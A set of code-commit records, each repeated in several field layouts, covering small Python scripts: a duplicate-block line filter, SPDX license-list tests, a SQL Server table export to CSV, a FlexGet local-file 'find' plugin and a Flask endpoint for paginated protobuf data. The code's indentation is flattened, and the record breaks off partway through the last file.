def filter_lines(fn):
seen = Set()
skip = False
is_empty = True
file_lines = open(fn, "r").readlines()
for line in file_lines:
line = line.strip()
if line == "":
is_empty = True
skip = False
print line
continue
if is_empty == True:
is_empty = False
if line in seen:
skip = True
else:
seen.add(line)
if skip == True:
continue
else:
print line
filter_lines(sys.argv[1])
|
<commit_before><commit_msg>Add script for filtering lines of IRTGs with multiple language preterms/terminals<commit_after>
|
#!/usr/bin/env python
import sys
from sets import Set
#Should be used on IRTGs with multiple language preterms/terminals
def filter_lines(fn):
seen = Set()
skip = False
is_empty = True
file_lines = open(fn, "r").readlines()
for line in file_lines:
line = line.strip()
if line == "":
is_empty = True
skip = False
print line
continue
if is_empty == True:
is_empty = False
if line in seen:
skip = True
else:
seen.add(line)
if skip == True:
continue
else:
print line
filter_lines(sys.argv[1])
|
Add script for filtering lines of IRTGs with multiple language preterms/terminals#!/usr/bin/env python
import sys
from sets import Set
#Should be used on IRTGs with multiple language preterms/terminals
def filter_lines(fn):
seen = Set()
skip = False
is_empty = True
file_lines = open(fn, "r").readlines()
for line in file_lines:
line = line.strip()
if line == "":
is_empty = True
skip = False
print line
continue
if is_empty == True:
is_empty = False
if line in seen:
skip = True
else:
seen.add(line)
if skip == True:
continue
else:
print line
filter_lines(sys.argv[1])
|
<commit_before><commit_msg>Add script for filtering lines of IRTGs with multiple language preterms/terminals<commit_after>#!/usr/bin/env python
import sys
from sets import Set
#Should be used on IRTGs with multiple language preterms/terminals
def filter_lines(fn):
seen = Set()
skip = False
is_empty = True
file_lines = open(fn, "r").readlines()
for line in file_lines:
line = line.strip()
if line == "":
is_empty = True
skip = False
print line
continue
if is_empty == True:
is_empty = False
if line in seen:
skip = True
else:
seen.add(line)
if skip == True:
continue
else:
print line
filter_lines(sys.argv[1])
|
|
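Worth noting: the script above is Python 2 (sets.Set, print statements). A minimal Python 3 sketch of the same logic — blocks are separated by blank lines, and a block is dropped when its first line has been seen before:

import sys

def filter_lines(fn):
    seen = set()       # first lines of blocks already emitted
    skip = False
    is_empty = True
    with open(fn) as f:
        for line in f:
            line = line.strip()
            if line == "":
                # Blank line ends the current block; always emit it.
                is_empty = True
                skip = False
                print(line)
                continue
            if is_empty:
                # First line of a new block decides whether to keep the block.
                is_empty = False
                if line in seen:
                    skip = True
                else:
                    seen.add(line)
            if not skip:
                print(line)

filter_lines(sys.argv[1])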
82ccee8813beea3fd2fb7a410ca341efc2133f07
|
tests/test_config.py
|
tests/test_config.py
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import unittest
from unittest import TestCase
from spdx import config
from spdx.version import Version
class TestLicenseList(TestCase):
def test_load_license_list(self):
version, licenses_map = config.load_license_list(config._licenses)
assert version == '2.6'
# Test some instances in licenses_map
assert licenses_map['MIT License'] == 'MIT'
assert licenses_map['MIT'] == 'MIT License'
assert licenses_map['Apache License 2.0'] == 'Apache-2.0'
assert licenses_map['Apache-2.0'] == 'Apache License 2.0'
assert licenses_map['GNU General Public License v3.0 only'] == 'GPL-3.0'
assert licenses_map['GPL-3.0'] == 'GNU General Public License v3.0 only'
def test_config_license_list_version_constant(self):
assert config.LICENSE_LIST_VERSION == Version(major=2, minor=6)
if __name__ == '__main__':
unittest.main()
|
Add tests for config.py functions and constants.
|
Add tests for config.py functions and constants.
Signed-off-by: Xavier Figueroa <2556c6f4facc1e5829d3394b9ce7316a84702c26@gmail.com>
|
Python
|
apache-2.0
|
spdx/tools-python
|
Add tests for config.py functions and constants.
Signed-off-by: Xavier Figueroa <2556c6f4facc1e5829d3394b9ce7316a84702c26@gmail.com>
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import unittest
from unittest import TestCase
from spdx import config
from spdx.version import Version
class TestLicenseList(TestCase):
def test_load_license_list(self):
version, licenses_map = config.load_license_list(config._licenses)
assert version == '2.6'
# Test some instances in licenses_map
assert licenses_map['MIT License'] == 'MIT'
assert licenses_map['MIT'] == 'MIT License'
assert licenses_map['Apache License 2.0'] == 'Apache-2.0'
assert licenses_map['Apache-2.0'] == 'Apache License 2.0'
assert licenses_map['GNU General Public License v3.0 only'] == 'GPL-3.0'
assert licenses_map['GPL-3.0'] == 'GNU General Public License v3.0 only'
def test_config_license_list_version_constant(self):
assert config.LICENSE_LIST_VERSION == Version(major=2, minor=6)
if __name__ == '__main__':
unittest.main()
|
<commit_before><commit_msg>Add tests for config.py functions and constants.
Signed-off-by: Xavier Figueroa <2556c6f4facc1e5829d3394b9ce7316a84702c26@gmail.com><commit_after>
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import unittest
from unittest import TestCase
from spdx import config
from spdx.version import Version
class TestLicenseList(TestCase):
def test_load_license_list(self):
version, licenses_map = config.load_license_list(config._licenses)
assert version == '2.6'
# Test some instances in licenses_map
assert licenses_map['MIT License'] == 'MIT'
assert licenses_map['MIT'] == 'MIT License'
assert licenses_map['Apache License 2.0'] == 'Apache-2.0'
assert licenses_map['Apache-2.0'] == 'Apache License 2.0'
assert licenses_map['GNU General Public License v3.0 only'] == 'GPL-3.0'
assert licenses_map['GPL-3.0'] == 'GNU General Public License v3.0 only'
def test_config_license_list_version_constant(self):
assert config.LICENSE_LIST_VERSION == Version(major=2, minor=6)
if __name__ == '__main__':
unittest.main()
|
Add tests for config.py functions and constants.
Signed-off-by: Xavier Figueroa <2556c6f4facc1e5829d3394b9ce7316a84702c26@gmail.com>from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import unittest
from unittest import TestCase
from spdx import config
from spdx.version import Version
class TestLicenseList(TestCase):
def test_load_license_list(self):
version, licenses_map = config.load_license_list(config._licenses)
assert version == '2.6'
# Test some instances in licenses_map
assert licenses_map['MIT License'] == 'MIT'
assert licenses_map['MIT'] == 'MIT License'
assert licenses_map['Apache License 2.0'] == 'Apache-2.0'
assert licenses_map['Apache-2.0'] == 'Apache License 2.0'
assert licenses_map['GNU General Public License v3.0 only'] == 'GPL-3.0'
assert licenses_map['GPL-3.0'] == 'GNU General Public License v3.0 only'
def test_config_license_list_version_constant(self):
assert config.LICENSE_LIST_VERSION == Version(major=2, minor=6)
if __name__ == '__main__':
unittest.main()
|
<commit_before><commit_msg>Add tests for config.py functions and constants.
Signed-off-by: Xavier Figueroa <2556c6f4facc1e5829d3394b9ce7316a84702c26@gmail.com><commit_after>from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import unittest
from unittest import TestCase
from spdx import config
from spdx.version import Version
class TestLicenseList(TestCase):
def test_load_license_list(self):
version, licenses_map = config.load_license_list(config._licenses)
assert version == '2.6'
# Test some instances in licenses_map
assert licenses_map['MIT License'] == 'MIT'
assert licenses_map['MIT'] == 'MIT License'
assert licenses_map['Apache License 2.0'] == 'Apache-2.0'
assert licenses_map['Apache-2.0'] == 'Apache License 2.0'
assert licenses_map['GNU General Public License v3.0 only'] == 'GPL-3.0'
assert licenses_map['GPL-3.0'] == 'GNU General Public License v3.0 only'
def test_config_license_list_version_constant(self):
assert config.LICENSE_LIST_VERSION == Version(major=2, minor=6)
if __name__ == '__main__':
unittest.main()
|
|
cb6105f837c4d5ca3cd06306a7b978905e89cb40
|
scripts/export_db.py
|
scripts/export_db.py
|
#!/usr/bin/env python
import os
from datetime import datetime
# Config
dbs = ["F_ST_ETIENNE_CMPP", "F_ST_ETIENNE_CAMSP", "F_ST_ETIENNE_SESSAD", "F_ST_ETIENNE_SESSAD_TED"]
tables = ["actes", "actes_non_factures", "ev"]
export_path = os.path.join("C:\\", "export", datetime.now().strftime("%Y%m%d-%H%M%S"))
os.mkdir(export_path)
for db in dbs:
db_dir = os.path.join(export_path, db)
os.mkdir(db_dir)
for table in tables:
os.system('sqlcmd -S SRVAPS -E -h-1 -s, -Q"SET NOCOUNT ON;' + \
'DECLARE @colnames VARCHAR(max); ' + \
"SELECT @colnames = COALESCE(@colnames + ',', '') " + \
'+ column_name from %s.INFORMATION_SCHEMA.COLUMNS ' % db + \
" where TABLE_NAME='%s'; select @colnames;\" " % table + \
'-o "%s-title.csv"' % os.path.join(db_dir, table))
os.system('bcp %s.dbo.%s out %s-data.csv -c -t, -T -SSRVAPS' % (db, table, os.path.join(db_dir, table)))
title = open("%s-title.csv" % os.path.join(db_dir, table), 'r')
data = open("%s-data.csv" % os.path.join(db_dir, table), 'r')
res = open("%s.csv" % os.path.join(db_dir, table), "a+")
res.write(title.readline())
res.write(data.read())
title.close()
data.close()
res.close()
os.remove("%s-title.csv" % os.path.join(db_dir, table))
os.remove("%s-data.csv" % os.path.join(db_dir, table))
|
Add a script to export Flaure DB
|
Add a script to export Flaure DB
|
Python
|
agpl-3.0
|
ZTH1970/alcide,ZTH1970/alcide,ZTH1970/alcide,ZTH1970/alcide,ZTH1970/alcide
|
Add a script to export Flaure DB
|
#!/usr/bin/env python
import os
from datetime import datetime
# Config
dbs = ["F_ST_ETIENNE_CMPP", "F_ST_ETIENNE_CAMSP", "F_ST_ETIENNE_SESSAD", "F_ST_ETIENNE_SESSAD_TED"]
tables = ["actes", "actes_non_factures", "ev"]
export_path = os.path.join("C:\\", "export", datetime.now().strftime("%Y%m%d-%H%M%S"))
os.mkdir(export_path)
for db in dbs:
db_dir = os.path.join(export_path, db)
os.mkdir(db_dir)
for table in tables:
os.system('sqlcmd -S SRVAPS -E -h-1 -s, -Q"SET NOCOUNT ON;' + \
'DECLARE @colnames VARCHAR(max); ' + \
"SELECT @colnames = COALESCE(@colnames + ',', '') " + \
'+ column_name from %s.INFORMATION_SCHEMA.COLUMNS ' % db + \
" where TABLE_NAME='%s'; select @colnames;\" " % table + \
'-o "%s-title.csv"' % os.path.join(db_dir, table))
os.system('bcp %s.dbo.%s out %s-data.csv -c -t, -T -SSRVAPS' % (db, table, os.path.join(db_dir, table)))
title = open("%s-title.csv" % os.path.join(db_dir, table), 'r')
data = open("%s-data.csv" % os.path.join(db_dir, table), 'r')
res = open("%s.csv" % os.path.join(db_dir, table), "a+")
res.write(title.readline())
res.write(data.read())
title.close()
data.close()
res.close()
os.remove("%s-title.csv" % os.path.join(db_dir, table))
os.remove("%s-data.csv" % os.path.join(db_dir, table))
|
<commit_before><commit_msg>Add a script to export Flaure DB<commit_after>
|
#!/usr/bin/env python
import os
from datetime import datetime
# Config
dbs = ["F_ST_ETIENNE_CMPP", "F_ST_ETIENNE_CAMSP", "F_ST_ETIENNE_SESSAD", "F_ST_ETIENNE_SESSAD_TED"]
tables = ["actes", "actes_non_factures", "ev"]
export_path = os.path.join("C:\\", "export", datetime.now().strftime("%Y%m%d-%H%M%S"))
os.mkdir(export_path)
for db in dbs:
db_dir = os.path.join(export_path, db)
os.mkdir(db_dir)
for table in tables:
os.system('sqlcmd -S SRVAPS -E -h-1 -s, -Q"SET NOCOUNT ON;' + \
'DECLARE @colnames VARCHAR(max); ' + \
"SELECT @colnames = COALESCE(@colnames + ',', '') " + \
'+ column_name from %s.INFORMATION_SCHEMA.COLUMNS ' % db + \
" where TABLE_NAME='%s'; select @colnames;\" " % table + \
'-o "%s-title.csv"' % os.path.join(db_dir, table))
os.system('bcp %s.dbo.%s out %s-data.csv -c -t, -T -SSRVAPS' % (db, table, os.path.join(db_dir, table)))
title = open("%s-title.csv" % os.path.join(db_dir, table), 'r')
data = open("%s-data.csv" % os.path.join(db_dir, table), 'r')
res = open("%s.csv" % os.path.join(db_dir, table), "a+")
res.write(title.readline())
res.write(data.read())
title.close()
data.close()
res.close()
os.remove("%s-title.csv" % os.path.join(db_dir, table))
os.remove("%s-data.csv" % os.path.join(db_dir, table))
|
Add a script to export Flaure DB#!/usr/bin/env python
import os
from datetime import datetime
# Config
dbs = ["F_ST_ETIENNE_CMPP", "F_ST_ETIENNE_CAMSP", "F_ST_ETIENNE_SESSAD", "F_ST_ETIENNE_SESSAD_TED"]
tables = ["actes", "actes_non_factures", "ev"]
export_path = os.path.join("C:\\", "export", datetime.now().strftime("%Y%m%d-%H%M%S"))
os.mkdir(export_path)
for db in dbs:
db_dir = os.path.join(export_path, db)
os.mkdir(db_dir)
for table in tables:
os.system('sqlcmd -S SRVAPS -E -h-1 -s, -Q"SET NOCOUNT ON;' + \
'DECLARE @colnames VARCHAR(max); ' + \
"SELECT @colnames = COALESCE(@colnames + ',', '') " + \
'+ column_name from %s.INFORMATION_SCHEMA.COLUMNS ' % db + \
" where TABLE_NAME='%s'; select @colnames;\" " % table + \
'-o "%s-title.csv"' % os.path.join(db_dir, table))
os.system('bcp %s.dbo.%s out %s-data.csv -c -t, -T -SSRVAPS' % (db, table, os.path.join(db_dir, table)))
title = open("%s-title.csv" % os.path.join(db_dir, table), 'r')
data = open("%s-data.csv" % os.path.join(db_dir, table), 'r')
res = open("%s.csv" % os.path.join(db_dir, table), "a+")
res.write(title.readline())
res.write(data.read())
title.close()
data.close()
res.close()
os.remove("%s-title.csv" % os.path.join(db_dir, table))
os.remove("%s-data.csv" % os.path.join(db_dir, table))
|
<commit_before><commit_msg>Add a script to export Flaure DB<commit_after>#!/usr/bin/env python
import os
from datetime import datetime
# Config
dbs = ["F_ST_ETIENNE_CMPP", "F_ST_ETIENNE_CAMSP", "F_ST_ETIENNE_SESSAD", "F_ST_ETIENNE_SESSAD_TED"]
tables = ["actes", "actes_non_factures", "ev"]
export_path = os.path.join("C:\\", "export", datetime.now().strftime("%Y%m%d-%H%M%S"))
os.mkdir(export_path)
for db in dbs:
db_dir = os.path.join(export_path, db)
os.mkdir(db_dir)
for table in tables:
os.system('sqlcmd -S SRVAPS -E -h-1 -s, -Q"SET NOCOUNT ON;' + \
'DECLARE @colnames VARCHAR(max); ' + \
"SELECT @colnames = COALESCE(@colnames + ',', '') " + \
'+ column_name from %s.INFORMATION_SCHEMA.COLUMNS ' % db + \
" where TABLE_NAME='%s'; select @colnames;\" " % table + \
'-o "%s-title.csv"' % os.path.join(db_dir, table))
os.system('bcp %s.dbo.%s out %s-data.csv -c -t, -T -SSRVAPS' % (db, table, os.path.join(db_dir, table)))
title = open("%s-title.csv" % os.path.join(db_dir, table), 'r')
data = open("%s-data.csv" % os.path.join(db_dir, table), 'r')
res = open("%s.csv" % os.path.join(db_dir, table), "a+")
res.write(title.readline())
res.write(data.read())
title.close()
data.close()
res.close()
os.remove("%s-title.csv" % os.path.join(db_dir, table))
os.remove("%s-data.csv" % os.path.join(db_dir, table))
|
|
14604c214b5117ad8fce4b92fd2bc911cb1a56b6
|
flexget/plugins/input_find.py
|
flexget/plugins/input_find.py
|
import logging
from flexget.plugin import register_plugin
log = logging.getLogger('find')
class InputFind:
"""
Uses local path content as an input, recurses through directories and creates entries for files that match mask.
You can specify either the mask key, in shell file matching format, (see python fnmatch module,) or regexp key.
Example:
find:
path: /storage/movies/
mask: *.avi
find:
path:
- /storage/movies/
- /storage/tv/
regexp: .*\.(avi|mkv)$
"""
def validator(self):
from flexget import validator
root = validator.factory('dict')
root.accept('path', key='path', required=True)
root.accept('list', key='path').accept('path')
root.accept('text', key='mask')
root.accept('regexp', key='regexp')
root.accept('boolean', key='recursive')
return root
def get_config(self, feed):
from fnmatch import translate
config = feed.config.get('find', None)
# If only a single path is passed turn it into a 1 element list
if isinstance(config['path'], basestring):
config['path'] = [config['path']]
config.setdefault('recursive', False)
        # If mask was specified, turn it into a regexp
if config.get('mask'):
config['regexp'] = translate(config['mask'])
# If no mask or regexp specified, accept all files
if not config.get('regexp'):
config['regexp'] = '.'
return config
def on_feed_input(self, feed):
from flexget.feed import Entry
import os
import re
config = self.get_config(feed)
match = re.compile(config['regexp'], re.IGNORECASE).match
for path in config['path']:
for item in os.walk(unicode(path)):
for name in item[2]:
#If mask fails continue
if match(name) is None:
continue
e = Entry()
e['title'] = name
filepath = os.path.join(item[0], name)
e['location'] = filepath
# Windows paths need an extra / prepended to them for url
if not filepath.startswith('/'):
filepath = '/' + filepath
e['url'] = 'file://%s' % (filepath)
feed.entries.append(e)
# If we are not searching recursively, break after first (base) directory
if not config['recursive']:
break
register_plugin(InputFind, 'find')
|
Add the find input plugin, which will produce entries from a local directory that match a mask.
|
Add the find input plugin, which will produce entries from a local directory that match a mask.
git-svn-id: ad91b9aa7ba7638d69f912c9f5d012e3326e9f74@1616 3942dd89-8c5d-46d7-aeed-044bccf3e60c
|
Python
|
mit
|
voriux/Flexget,spencerjanssen/Flexget,thalamus/Flexget,Pretagonist/Flexget,sean797/Flexget,qk4l/Flexget,Flexget/Flexget,thalamus/Flexget,jacobmetrick/Flexget,crawln45/Flexget,cvium/Flexget,jacobmetrick/Flexget,vfrc2/Flexget,Danfocus/Flexget,poulpito/Flexget,offbyone/Flexget,oxc/Flexget,LynxyssCZ/Flexget,grrr2/Flexget,v17al/Flexget,xfouloux/Flexget,antivirtel/Flexget,tarzasai/Flexget,tobinjt/Flexget,Danfocus/Flexget,qvazzler/Flexget,asm0dey/Flexget,ibrahimkarahan/Flexget,tsnoam/Flexget,jawilson/Flexget,qvazzler/Flexget,LynxyssCZ/Flexget,dsemi/Flexget,jawilson/Flexget,spencerjanssen/Flexget,OmgOhnoes/Flexget,v17al/Flexget,Danfocus/Flexget,tarzasai/Flexget,JorisDeRieck/Flexget,malkavi/Flexget,ratoaq2/Flexget,malkavi/Flexget,Danfocus/Flexget,dsemi/Flexget,vfrc2/Flexget,Pretagonist/Flexget,crawln45/Flexget,sean797/Flexget,tobinjt/Flexget,sean797/Flexget,malkavi/Flexget,offbyone/Flexget,gazpachoking/Flexget,OmgOhnoes/Flexget,grrr2/Flexget,asm0dey/Flexget,ianstalk/Flexget,spencerjanssen/Flexget,poulpito/Flexget,jawilson/Flexget,tsnoam/Flexget,ZefQ/Flexget,Flexget/Flexget,tsnoam/Flexget,gazpachoking/Flexget,crawln45/Flexget,ZefQ/Flexget,JorisDeRieck/Flexget,tvcsantos/Flexget,asm0dey/Flexget,patsissons/Flexget,Pretagonist/Flexget,qk4l/Flexget,drwyrm/Flexget,oxc/Flexget,jawilson/Flexget,jacobmetrick/Flexget,patsissons/Flexget,thalamus/Flexget,voriux/Flexget,cvium/Flexget,LynxyssCZ/Flexget,JorisDeRieck/Flexget,ibrahimkarahan/Flexget,crawln45/Flexget,JorisDeRieck/Flexget,tobinjt/Flexget,malkavi/Flexget,ianstalk/Flexget,qvazzler/Flexget,drwyrm/Flexget,poulpito/Flexget,drwyrm/Flexget,Flexget/Flexget,grrr2/Flexget,X-dark/Flexget,tarzasai/Flexget,dsemi/Flexget,cvium/Flexget,vfrc2/Flexget,xfouloux/Flexget,LynxyssCZ/Flexget,ratoaq2/Flexget,ZefQ/Flexget,lildadou/Flexget,qk4l/Flexget,xfouloux/Flexget,antivirtel/Flexget,lildadou/Flexget,Flexget/Flexget,camon/Flexget,X-dark/Flexget,lildadou/Flexget,oxc/Flexget,camon/Flexget,patsissons/Flexget,OmgOhnoes/Flexget,ibrahimkarahan/Flexget,ianstalk/Flexget,ratoaq2/Flexget,v17al/Flexget,offbyone/Flexget,tvcsantos/Flexget,antivirtel/Flexget,tobinjt/Flexget,X-dark/Flexget
|
Add the find input plugin, which will produce entries from a local directory that match a mask.
git-svn-id: ad91b9aa7ba7638d69f912c9f5d012e3326e9f74@1616 3942dd89-8c5d-46d7-aeed-044bccf3e60c
|
import logging
from flexget.plugin import register_plugin
log = logging.getLogger('find')
class InputFind:
"""
Uses local path content as an input, recurses through directories and creates entries for files that match mask.
You can specify either the mask key, in shell file matching format, (see python fnmatch module,) or regexp key.
Example:
find:
path: /storage/movies/
mask: *.avi
find:
path:
- /storage/movies/
- /storage/tv/
regexp: .*\.(avi|mkv)$
"""
def validator(self):
from flexget import validator
root = validator.factory('dict')
root.accept('path', key='path', required=True)
root.accept('list', key='path').accept('path')
root.accept('text', key='mask')
root.accept('regexp', key='regexp')
root.accept('boolean', key='recursive')
return root
def get_config(self, feed):
from fnmatch import translate
config = feed.config.get('find', None)
# If only a single path is passed turn it into a 1 element list
if isinstance(config['path'], basestring):
config['path'] = [config['path']]
config.setdefault('recursive', False)
        # If mask was specified, turn it into a regexp
if config.get('mask'):
config['regexp'] = translate(config['mask'])
# If no mask or regexp specified, accept all files
if not config.get('regexp'):
config['regexp'] = '.'
return config
def on_feed_input(self, feed):
from flexget.feed import Entry
import os
import re
config = self.get_config(feed)
match = re.compile(config['regexp'], re.IGNORECASE).match
for path in config['path']:
for item in os.walk(unicode(path)):
for name in item[2]:
#If mask fails continue
if match(name) is None:
continue
e = Entry()
e['title'] = name
filepath = os.path.join(item[0], name)
e['location'] = filepath
# Windows paths need an extra / prepended to them for url
if not filepath.startswith('/'):
filepath = '/' + filepath
e['url'] = 'file://%s' % (filepath)
feed.entries.append(e)
# If we are not searching recursively, break after first (base) directory
if not config['recursive']:
break
register_plugin(InputFind, 'find')
|
<commit_before><commit_msg>Add the find input plugin, which will produce entries from a local directory that match a mask.
git-svn-id: ad91b9aa7ba7638d69f912c9f5d012e3326e9f74@1616 3942dd89-8c5d-46d7-aeed-044bccf3e60c<commit_after>
|
import logging
from flexget.plugin import register_plugin
log = logging.getLogger('find')
class InputFind:
"""
Uses local path content as an input, recurses through directories and creates entries for files that match mask.
You can specify either the mask key, in shell file matching format, (see python fnmatch module,) or regexp key.
Example:
find:
path: /storage/movies/
mask: *.avi
find:
path:
- /storage/movies/
- /storage/tv/
regexp: .*\.(avi|mkv)$
"""
def validator(self):
from flexget import validator
root = validator.factory('dict')
root.accept('path', key='path', required=True)
root.accept('list', key='path').accept('path')
root.accept('text', key='mask')
root.accept('regexp', key='regexp')
root.accept('boolean', key='recursive')
return root
def get_config(self, feed):
from fnmatch import translate
config = feed.config.get('find', None)
# If only a single path is passed turn it into a 1 element list
if isinstance(config['path'], basestring):
config['path'] = [config['path']]
config.setdefault('recursive', False)
        # If mask was specified, turn it into a regexp
if config.get('mask'):
config['regexp'] = translate(config['mask'])
# If no mask or regexp specified, accept all files
if not config.get('regexp'):
config['regexp'] = '.'
return config
def on_feed_input(self, feed):
from flexget.feed import Entry
import os
import re
config = self.get_config(feed)
match = re.compile(config['regexp'], re.IGNORECASE).match
for path in config['path']:
for item in os.walk(unicode(path)):
for name in item[2]:
#If mask fails continue
if match(name) is None:
continue
e = Entry()
e['title'] = name
filepath = os.path.join(item[0], name)
e['location'] = filepath
# Windows paths need an extra / prepended to them for url
if not filepath.startswith('/'):
filepath = '/' + filepath
e['url'] = 'file://%s' % (filepath)
feed.entries.append(e)
# If we are not searching recursively, break after first (base) directory
if not config['recursive']:
break
register_plugin(InputFind, 'find')
|
Add the find input plugin, which will produce entries from a local directory that match a mask.
git-svn-id: ad91b9aa7ba7638d69f912c9f5d012e3326e9f74@1616 3942dd89-8c5d-46d7-aeed-044bccf3e60cimport logging
from flexget.plugin import register_plugin
log = logging.getLogger('find')
class InputFind:
"""
Uses local path content as an input, recurses through directories and creates entries for files that match mask.
You can specify either the mask key, in shell file matching format, (see python fnmatch module,) or regexp key.
Example:
find:
path: /storage/movies/
mask: *.avi
find:
path:
- /storage/movies/
- /storage/tv/
regexp: .*\.(avi|mkv)$
"""
def validator(self):
from flexget import validator
root = validator.factory('dict')
root.accept('path', key='path', required=True)
root.accept('list', key='path').accept('path')
root.accept('text', key='mask')
root.accept('regexp', key='regexp')
root.accept('boolean', key='recursive')
return root
def get_config(self, feed):
from fnmatch import translate
config = feed.config.get('find', None)
# If only a single path is passed turn it into a 1 element list
if isinstance(config['path'], basestring):
config['path'] = [config['path']]
config.setdefault('recursive', False)
        # If mask was specified, turn it into a regexp
if config.get('mask'):
config['regexp'] = translate(config['mask'])
# If no mask or regexp specified, accept all files
if not config.get('regexp'):
config['regexp'] = '.'
return config
def on_feed_input(self, feed):
from flexget.feed import Entry
import os
import re
config = self.get_config(feed)
match = re.compile(config['regexp'], re.IGNORECASE).match
for path in config['path']:
for item in os.walk(unicode(path)):
for name in item[2]:
#If mask fails continue
if match(name) is None:
continue
e = Entry()
e['title'] = name
filepath = os.path.join(item[0], name)
e['location'] = filepath
# Windows paths need an extra / prepended to them for url
if not filepath.startswith('/'):
filepath = '/' + filepath
e['url'] = 'file://%s' % (filepath)
feed.entries.append(e)
# If we are not searching recursively, break after first (base) directory
if not config['recursive']:
break
register_plugin(InputFind, 'find')
|
<commit_before><commit_msg>Add the find input plugin, which will produce entries from a local directory that match a mask.
git-svn-id: ad91b9aa7ba7638d69f912c9f5d012e3326e9f74@1616 3942dd89-8c5d-46d7-aeed-044bccf3e60c<commit_after>import logging
from flexget.plugin import register_plugin
log = logging.getLogger('find')
class InputFind:
"""
Uses local path content as an input, recurses through directories and creates entries for files that match mask.
You can specify either the mask key, in shell file matching format, (see python fnmatch module,) or regexp key.
Example:
find:
path: /storage/movies/
mask: *.avi
find:
path:
- /storage/movies/
- /storage/tv/
regexp: .*\.(avi|mkv)$
"""
def validator(self):
from flexget import validator
root = validator.factory('dict')
root.accept('path', key='path', required=True)
root.accept('list', key='path').accept('path')
root.accept('text', key='mask')
root.accept('regexp', key='regexp')
root.accept('boolean', key='recursive')
return root
def get_config(self, feed):
from fnmatch import translate
config = feed.config.get('find', None)
        # If only a single path is passed, turn it into a one-element list
if isinstance(config['path'], basestring):
config['path'] = [config['path']]
config.setdefault('recursive', False)
        # If mask was specified, turn it into a regexp
if config.get('mask'):
config['regexp'] = translate(config['mask'])
# If no mask or regexp specified, accept all files
if not config.get('regexp'):
config['regexp'] = '.'
return config
def on_feed_input(self, feed):
from flexget.feed import Entry
import os
import re
config = self.get_config(feed)
match = re.compile(config['regexp'], re.IGNORECASE).match
for path in config['path']:
for item in os.walk(unicode(path)):
for name in item[2]:
                    # If the mask does not match, skip this file
if match(name) is None:
continue
e = Entry()
e['title'] = name
filepath = os.path.join(item[0], name)
e['location'] = filepath
# Windows paths need an extra / prepended to them for url
if not filepath.startswith('/'):
filepath = '/' + filepath
e['url'] = 'file://%s' % (filepath)
feed.entries.append(e)
# If we are not searching recursively, break after first (base) directory
if not config['recursive']:
break
register_plugin(InputFind, 'find')
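For reference, a quick standalone sketch of what the mask-to-regexp conversion in get_config produces. fnmatch.translate is part of the standard library; the exact pattern string it returns varies across Python versions, so treat the example output as illustrative:

from fnmatch import translate
import re

# translate() turns a shell-style mask into an equivalent regexp string,
# e.g. '*.avi' becomes something like '(?s:.*\.avi)\Z' on modern Pythons.
pattern = translate('*.avi')
match = re.compile(pattern, re.IGNORECASE).match
print(bool(match('movie.AVI')))  # True
print(bool(match('movie.mkv')))  # False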
|
|
769228b6ecf29112c1880802404152822687bb8e
|
backend/data_controller.py
|
backend/data_controller.py
|
from google.protobuf.json_format import MessageToDict
from grpc.messages import data_pb2
import config
from flask_restful import Resource
from flask import request, Flask
import csv
from google.protobuf.timestamp_pb2 import Timestamp
from datetime import datetime
saved_data = {}
app = Flask(__name__)
class Data(Resource):
def get(self, filename):
page = int(request.args.get('page')) if request.args.get('page') else 0
per_page = int(request.args.get('per_page')) if request.args.get('per_page') else config.per_page
if filename in saved_data:
data = saved_data[filename]
else:
data = get_data(config.UPLOAD_FOLDER + '/' + filename)
saved_data[filename] = data
response = data_pb2.SegmentedTimelineDataResponse()
        response.data.extend(list(data.values())[(page * per_page):(page * per_page + per_page)])
return MessageToDict(response)
def add_data(segment, date, inventory):
timestamp = Timestamp()
timestamp.FromDatetime(datetime.strptime(date, '%Y-%m-%d'))
segment.dates.append(timestamp)
segment.inventory_volumes.append(int(inventory))
def get_data(filename):
segments_to_data = {}
with open(filename) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
cursor = iter(csv_reader)
# in order to skip the first line
next(cursor)
for row in cursor:
if (row[1], row[2]) not in segments_to_data:
segments_to_data[(row[1], row[2])] = data_pb2.SegmentData(country=row[1], device=row[2])
add_data(segments_to_data[(row[1], row[2])], row[0], row[3])
return segments_to_data
|
Create Data resource for sending data from the server
|
Create Data resource for sending data from the server
|
Python
|
apache-2.0
|
googleinterns/inventory-visualizer,googleinterns/inventory-visualizer,googleinterns/inventory-visualizer,googleinterns/inventory-visualizer,googleinterns/inventory-visualizer
|
Create Data resource for sending data from the server
|
from google.protobuf.json_format import MessageToDict
from grpc.messages import data_pb2
import config
from flask_restful import Resource
from flask import request, Flask
import csv
from google.protobuf.timestamp_pb2 import Timestamp
from datetime import datetime
saved_data = {}
app = Flask(__name__)
class Data(Resource):
def get(self, filename):
page = int(request.args.get('page')) if request.args.get('page') else 0
per_page = int(request.args.get('per_page')) if request.args.get('per_page') else config.per_page
if filename in saved_data:
data = saved_data[filename]
else:
data = get_data(config.UPLOAD_FOLDER + '/' + filename)
saved_data[filename] = data
response = data_pb2.SegmentedTimelineDataResponse()
        response.data.extend(list(data.values())[(page * per_page):(page * per_page + per_page)])
return MessageToDict(response)
def add_data(segment, date, inventory):
timestamp = Timestamp()
timestamp.FromDatetime(datetime.strptime(date, '%Y-%m-%d'))
segment.dates.append(timestamp)
segment.inventory_volumes.append(int(inventory))
def get_data(filename):
segments_to_data = {}
with open(filename) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
cursor = iter(csv_reader)
# in order to skip the first line
next(cursor)
for row in cursor:
if (row[1], row[2]) not in segments_to_data:
segments_to_data[(row[1], row[2])] = data_pb2.SegmentData(country=row[1], device=row[2])
add_data(segments_to_data[(row[1], row[2])], row[0], row[3])
return segments_to_data
|
<commit_before><commit_msg>Create Data resource for sending data from the server<commit_after>
|
from google.protobuf.json_format import MessageToDict
from grpc.messages import data_pb2
import config
from flask_restful import Resource
from flask import request, Flask
import csv
from google.protobuf.timestamp_pb2 import Timestamp
from datetime import datetime
saved_data = {}
app = Flask(__name__)
class Data(Resource):
def get(self, filename):
page = int(request.args.get('page')) if request.args.get('page') else 0
per_page = int(request.args.get('per_page')) if request.args.get('per_page') else config.per_page
if filename in saved_data:
data = saved_data[filename]
else:
